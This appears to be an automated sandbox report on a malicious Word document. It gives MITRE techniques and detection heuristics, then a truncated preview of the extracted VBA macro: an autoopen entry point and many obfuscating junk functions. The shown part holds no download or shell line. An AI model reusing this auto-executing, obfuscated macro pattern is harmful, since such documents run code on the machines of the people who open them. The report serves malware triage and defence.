Verdict: MALICIOUS
Risk Score: 242

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution

Malware Insights
The sample is an OLE document containing a VBA macro. The macro runs from an autoopen() entry point and uses a Shell() call, indicating an attempt to execute arbitrary commands. This is strongly suggestive of downloader or dropper functionality, where the macro fetches and executes a second-stage payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.
Heuristics (7)
- ClamAV: Doc.Macro.DollarShell-6346616-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11672 bytes | 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0 |
Preview script: first 1,000 lines of the extracted script (output truncated)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
RZwZYPM
End Sub
Function kNCwPPkFd()
Dim GutFDFNybds(8089)
GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406
GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423
GutFDFNybds(4342) = sHVnYaZuR
GutFDFNybds(2382) = UfNMzVwuM
GutFDFNybds(557) = xLdSpLf
GutFDFNybds(629) = vTTKYGKmuv
GutFDFNybds(2795) = CrmBcuvWC
GutFDFNybds(2405) = exEBCkAL
GutFDFNybds(4451) = pgGHFPYZdy
GutFDFNybds(2122) = gVxXHMhTM
GutFDFNybds(5029) = nTMxXxtDL
GutFDFNybds(3250) = cKcpvXG
GutFDFNybds(3999) = FxMPYCNRWe
End Function
Function gkCetzrWsg()
Dim zvDNUZB(1233)
zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944
zvDNUZB(975) = tRsMZML
zvDNUZB(572) = TDYFhcgKE
zvDNUZB(709) = bMxWLzh
zvDNUZB(262) = vZVpxwdDxev
zvDNUZB(228) = XwwERktFf
zvDNUZB(81) = FttyLXGgdKD
zvDNUZB(332) = MkdhmBUTY
zvDNUZB(684) = vSCCfPHfr
zvDNUZB(806) = WXpAhFrxnd
zvDNUZB(975) = PtHxpePczMs
zvDNUZB(301) = CDLgXUKry
zvDNUZB(182) = UXMuYDaW
zvDNUZB(184) = BpCsfEcnZ
zvDNUZB(158) = DfktxzuL
zvDNUZB(303) = SvVSrGyauu
zvDNUZB(489) = MfmLRttRGDk
zvDNUZB(180) = fgFFvVrze
zvDNUZB(576) = EMZSGKM
zvDNUZB(535) = gACHwUa
zvDNUZB(761) = SHpTxZGK
zvDNUZB(644) = KbzdzhnNBZy
zvDNUZB(1105) = XfyPudbBNNM
End Function
Function hzvmYnYUkw()
Dim yyPnEeM(6298)
yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019
yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760
yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032
yyPnEeM(3336) = ynLcTsuK
yyPnEeM(1822) = kuugbMCnpa
yyPnEeM(1442) = gDPKYpefhfx
yyPnEeM(2591) = uXAXDsZDDBn
yyPnEeM(2934) = LUrwbKrVfF
yyPnEeM(2858) = dpeycnMTM
yyPnEeM(2780) = dRzuUFD
yyPnEeM(1901) = eGYpXwg
yyPnEeM(2508) = DyDFpzM
yyPnEeM(4870) = VhAUkzxha
yyPnEeM(135) = FyUaYZS
yyPnEeM(1148) = YyMmyhecM
yyPnEeM(2157) = YYzMytSzB
yyPnEeM(5411) = WApKTcg
yyPnEeM(2093) = PDwYmkgPCer
yyPnEeM(2462) = AhpxSZeNwZs
yyPnEeM(3939) = HrNECVA
yyPnEeM(1683) = rZPUdnYssP
yyPnEeM(509) = dtnWNFbSr
yyPnEeM(4444) = BfxMzwg
yyPnEeM(5914) = mprHLXwTCyc
yyPnEeM(4473) = bbcKDBxKh
yyPnEeM(4062) = eZPPGHpFB
yyPnEeM(1949) = ueRzgKEk
yyPnEeM(2535) = vVwXdDwuVp
yyPnEeM(923) = TAMTGzRPa
End Function
Function KkKDUAzcSw()
Dim ngeCtBrdPp(5921)
ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888
ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633
ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155
ngeCtBrdPp(5548) = DzwvmaYBu
ngeCtBrdPp(5615) = btDwYCHU
ngeCtBrdPp(4139) = NzbytHV
ngeCtBrdPp(3241) = swrDKwrtL
ngeCtBrdPp(3078) = VXpHRpU
ngeCtBrdPp(2615) = pKprMaSe
ngeCtBrdPp(954) = WYBvzXcc
ngeCtBrdPp(919) = vFtVCczS
ngeCtBrdPp(2432) = UwrbAZtUSE
ngeCtBrdPp(1307) = ptawGGZTeyk
ngeCtBrdPp(3512) = TemDwAh
ngeCtBrdPp(2411) = KTfLESnWhY
ngeCtBrdPp(5264) = szwrFKdBE
ngeCtBrdPp(4510) = ryrTWZFNuz
ngeCtBrdPp(1609) = TMGMsmaMGa
ngeCtBrdPp(4054) = zkTrhfwxp
ngeCtBrdPp(4184) = EsEULEhrG
ngeCtBrdPp(5510) = hYbMcXxZKfX
ngeCtBrdPp(767) = fnsRHMvnRBa
ngeCtBrdPp(4645) = kHtsCWm
ngeCtBrdPp(99) = xvwrLRvVT
ngeCtBrdPp(1167) = dNcmgHngS
ngeCtBrdPp(5840) = wTUfXsam
ngeCtBrdPp(5655) = dBuxdDDYf
End Function
Function ZtBSGbLzXHa()
Dim XgnefYfX(9516)
XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712
XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196
XgnefYfX(5975) = XUMzkLWpc
XgnefYfX(3632) = nAsuaDm
XgnefYfX(9384) = fDUkuEeFbTC
XgnefYfX(1556) = ZESzdUFxPnt
XgnefYfX(6100) = abnKyfSyc
XgnefYfX(7632) = LuCUcUywe
```

... (truncated)